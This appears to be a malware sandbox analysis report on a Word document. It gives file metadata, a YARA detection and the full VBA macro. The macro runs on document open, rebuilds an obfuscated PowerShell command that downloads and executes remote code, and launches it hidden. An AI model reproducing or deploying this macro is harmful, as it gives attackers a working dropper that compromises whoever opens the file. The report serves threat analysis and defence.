VTI SCORE: 98/100
Dynamic Analysis Report |
Classification: - |
Nuovo documento 73.doc
Word Document
Created at 2019-10-11T15:50:00
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filters: |
There are no files for this filter
There are no files in this analysis
Filename | Category | Type | Severity | Actions |
---|
C:\Users\aETAdzjz\Desktop\Nuovo documento 73.doc | Sample File | Word Document |
Suspicious
|
...
|
»
Office Information
»
Creator | Administrator |
Last Modified By | Administrator |
Revision | 3 |
Create Time | 2019-10-11 17:18:00+00:00 |
Modify Time | 2019-10-11 18:28:00+00:00 |
Document Information
»
Codepage | Latin-1 |
Application | Microsoft Office Word |
App Version | 16.0 |
Template | Normal.dotm |
Document Security | SecurityFlag.NONE |
Editing Time | 180.0 |
Page Count | 1 |
Line Count | 1 |
Paragraph Count | 1 |
Character Count | 1 |
Chars With Spaces | 1 |
Heading Pairs | Title |
scale_crop | False |
shared_doc | False |
Controls (1)
»
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{00020906-0000-0000-C000-000000000046} | Word97 | - |
VBA Macros (1)
»
Macro #1: ThisDocument
»
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ehfhb(ebdde, vxsg)
ehfhb = vxsg + ebdde
End Function
Private Sub fyasb(avtv, eavi, hxcz)
eavi.Run avtv, hxcz
End Sub
Private Function aeeyg()
ahxc = 0
htaux = ""
htaux = yjsvy(htaux, -372)
htaux = yjsvy(htaux, -373)
htaux = yjsvy(htaux, -365)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -370)
htaux = yjsvy(htaux, -369)
htaux = yjsvy(htaux, -380)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -376)
htaux = yjsvy(htaux, -376)
htaux = yjsvy(htaux, -452)
htaux = yjsvy(htaux, -379)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -364)
htaux = yjsvy(htaux, -452)
htaux = yjsvy(htaux, -444)
htaux = yjsvy(htaux, -444)
htaux = yjsvy(htaux, -406)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -365)
htaux = yjsvy(htaux, -439)
htaux = yjsvy(htaux, -405)
htaux = yjsvy(htaux, -386)
htaux = yjsvy(htaux, -378)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -385)
htaux = yjsvy(htaux, -368)
htaux = yjsvy(htaux, -452)
htaux = yjsvy(htaux, -406)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -368)
htaux = yjsvy(htaux, -438)
htaux = yjsvy(htaux, -397)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -386)
htaux = yjsvy(htaux, -417)
htaux = yjsvy(htaux, -376)
htaux = yjsvy(htaux, -379)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -374)
htaux = yjsvy(htaux, -368)
htaux = yjsvy(htaux, -443)
htaux = yjsvy(htaux, -438)
htaux = yjsvy(htaux, -416)
htaux = yjsvy(htaux, -373)
htaux = yjsvy(htaux, -365)
htaux = yjsvy(htaux, -374)
htaux = yjsvy(htaux, -376)
htaux = yjsvy(htaux, -373)
htaux = yjsvy(htaux, -387)
htaux = yjsvy(htaux, -384)
htaux = yjsvy(htaux, -401)
htaux = yjsvy(htaux, -368)
htaux = yjsvy(htaux, -370)
htaux = yjsvy(htaux, -379)
htaux = yjsvy(htaux, -374)
htaux = yjsvy(htaux, -381)
htaux = yjsvy(htaux, -444)
htaux = yjsvy(htaux, -445)
htaux = yjsvy(htaux, -380)
htaux = yjsvy(htaux, -368)
htaux = yjsvy(htaux, -368)
htaux = yjsvy(htaux, -372)
htaux = yjsvy(htaux, -426)
htaux = yjsvy(htaux, -437)
htaux = yjsvy(htaux, -437)
htaux = yjsvy(htaux, -378)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -369)
htaux = yjsvy(htaux, -438)
htaux = yjsvy(htaux, -365)
htaux = yjsvy(htaux, -380)
htaux = yjsvy(htaux, -379)
htaux = yjsvy(htaux, -369)
htaux = yjsvy(htaux, -372)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -370)
htaux = yjsvy(htaux, -379)
htaux = yjsvy(htaux, -374)
htaux = yjsvy(htaux, -381)
htaux = yjsvy(htaux, -380)
htaux = yjsvy(htaux, -379)
htaux = yjsvy(htaux, -376)
htaux = yjsvy(htaux, -376)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -371)
htaux = yjsvy(htaux, -367)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -369)
htaux = yjsvy(htaux, -368)
htaux = yjsvy(htaux, -370)
htaux = yjsvy(htaux, -379)
htaux = yjsvy(htaux, -387)
htaux = yjsvy(htaux, -374)
htaux = yjsvy(htaux, -385)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -374)
htaux = yjsvy(htaux, -368)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -370)
htaux = yjsvy(htaux, -438)
htaux = yjsvy(htaux, -385)
htaux = yjsvy(htaux, -373)
htaux = yjsvy(htaux, -375)
htaux = yjsvy(htaux, -437)
htaux = yjsvy(htaux, -421)
htaux = yjsvy(htaux, -374)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -384)
htaux = yjsvy(htaux, -423)
htaux = yjsvy(htaux, -369)
htaux = yjsvy(htaux, -368)
htaux = yjsvy(htaux, -387)
htaux = yjsvy(htaux, -382)
htaux = yjsvy(htaux, -380)
htaux = yjsvy(htaux, -364)
htaux = yjsvy(htaux, -368)
htaux = yjsvy(htaux, -446)
htaux = yjsvy(htaux, -366)
htaux = yjsvy(htaux, -379)
htaux = yjsvy(htaux, -384)
htaux = yjsvy(htaux, -423)
htaux = yjsvy(htaux, -384)
htaux = yjsvy(htaux, -372)
htaux = yjsvy(htaux, -383)
htaux = yjsvy(htaux, -385)
htaux = yjsvy(htaux, -427)
htaux = yjsvy(htaux, -446)
htaux = yjsvy(htaux, -432)
htaux = yjsvy(htaux, -436)
htaux = yjsvy(htaux, -433)
htaux = yjsvy(htaux, -436)
htaux = yjsvy(htaux, -429)
htaux = yjsvy(htaux, -445)
htaux = yjsvy(htaux, -443)
htaux = yjsvy(htaux, -443)
htaux = yjsvy(htaux, -425)
fyasb htaux, CreateObject("WScript.Shell"), 0
End Function
Private Sub Document_Open()
aeeyg
End Sub
Private Function yjsvy(fuui, euatj)
extfa = ehfhb(euatj, 484)
iide = ehfhb("", Chr(extfa))
yjsvy = ehfhb(iide, fuui)
End Function
YARA Matches (1)
»
Rule Name | Rule Description | Classification | Score | Actions |
---|---|---|---|---|
VBA_Execution_Commands | VBA macro may execute files or system commands | - |
3/5
|
...
|